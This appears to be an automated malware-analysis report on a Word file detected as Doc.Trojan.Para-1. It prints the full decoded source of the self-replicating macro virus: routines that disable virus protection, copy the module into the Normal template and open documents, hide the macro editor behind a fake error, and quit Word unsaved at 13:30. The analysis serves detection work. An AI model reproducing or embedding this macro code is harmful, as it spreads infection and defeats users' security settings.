Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro markers and VBA macros, with ClamAV identifying it as 'Doc.Trojan.Para-1'. The 'paranoid' VBA module includes an AutoExec subroutine that calls PayLoad and Paranoid. The Paranoid subroutine attempts to disable virus protection and import the 'paranoid' macro into both the Normal template and the active document, suggesting an attempt to establish persistence and evade detection. The PayLoad subroutine appears to manipulate the application window, though its full functionality is truncated.
Heuristics (3)

- ClamAV: Doc.Trojan.Para-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Para-1
- Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS): OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: fef597218bb2f5431c7de0842b44a21a6f48decfb514a5cd174aa4a69cf6e3e1) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2125 bytes |

Detection for macros.bas:
- ClamAV: Doc.Trojan.Para-1
- Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script (olevba concatenates the ThisDocument and "paranoid" modules, hence the two VB_Name attributes).

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "paranoid"
' Runs automatically when Word starts from an infected Normal template.
Sub AutoExec()
    Call PayLoad
    Call Paranoid
End Sub
' Hooks the built-in Save As and Close commands so every save/close re-infects.
Sub FileSaveAs()
    Call Paranoid
    Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileClose()
    Call Paranoid
    WordBasic.FileClose
End Sub
' Turns off the macro virus warning and copies the "paranoid" module between
' the Normal template and the active document via a temporary export file.
Sub Paranoid()
    On Error Resume Next
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
        .ConfirmConversions = False
    End With
    Set BVictim = NormalTemplate.VBProject.VBComponents
    Set SVictim = ActiveDocument.VBProject.VBComponents
    If BVictim.Item("paranoid").Name <> "paranoid" Then
        SVictim("paranoid").Export "c:\paranoid.sys"
        Set DoIt = NormalTemplate.VBProject
        DoIt.VBComponents.Import ("c:\paranoid.sys")
        Kill ("c:\paranoid.sys")
    End If
    If SVictim.Item("paranoid").Name <> "paranoid" Then
        BVictim("paranoid").Export "c:\paranoid.sys"
        Set DoIt = ActiveDocument.VBProject
        DoIt.VBComponents.Import ("c:\paranoid.sys")
        Kill ("c:\paranoid.sys")
    End If
End Sub
Sub FileExit()
    Call AutoExit
    WordBasic.FileExit
End Sub
' Restores the virus warning on exit so the changed setting is less noticeable.
Sub AutoExit()
    Options.VirusProtection = True
End Sub
' Replaces the macro editor, template organizer and macro dialog with a fake error.
Sub ViewVBCode()
    Call Stealth
End Sub
Sub FileTemplates()
    Call Stealth
End Sub
Sub ToolsMacro()
    Call Stealth
End Sub
' Message text is Russian: "Required library VBAGRP8.DLL not found."
Sub Stealth()
    MsgBox "Необходимая библиотека VBAGRP8.DLL не найдена.", vbOKOnly + vbExclamation, "Microsoft Visual Basic"
End Sub
' At 13:30 shrinks the Word window step by step, shows a message box and quits
' without saving.
Sub PayLoad()
    If Hour(Now) = 13 And Minute(Now) = 30 Then
        a = Application.Width
        b = Application.Height
        Application.WindowState = wdWindowStateNormal
        Application.Resize Width:=a, Height:=b
        Application.Move Left:=0, Top:=0
        c = (b / a) * 5
        d = a / 5
        For x = 0 To d
            Application.Resize Width:=a, Height:=b
            a = a - 5
            b = b - c
        Next
        MsgBox "Dis is di end, my only friend, di end...", vbOKOnly + vbExclamation + vbSystemModal, "Paranoid"
        Application.Quit wdDoNotSaveChanges
    End If
End Sub
```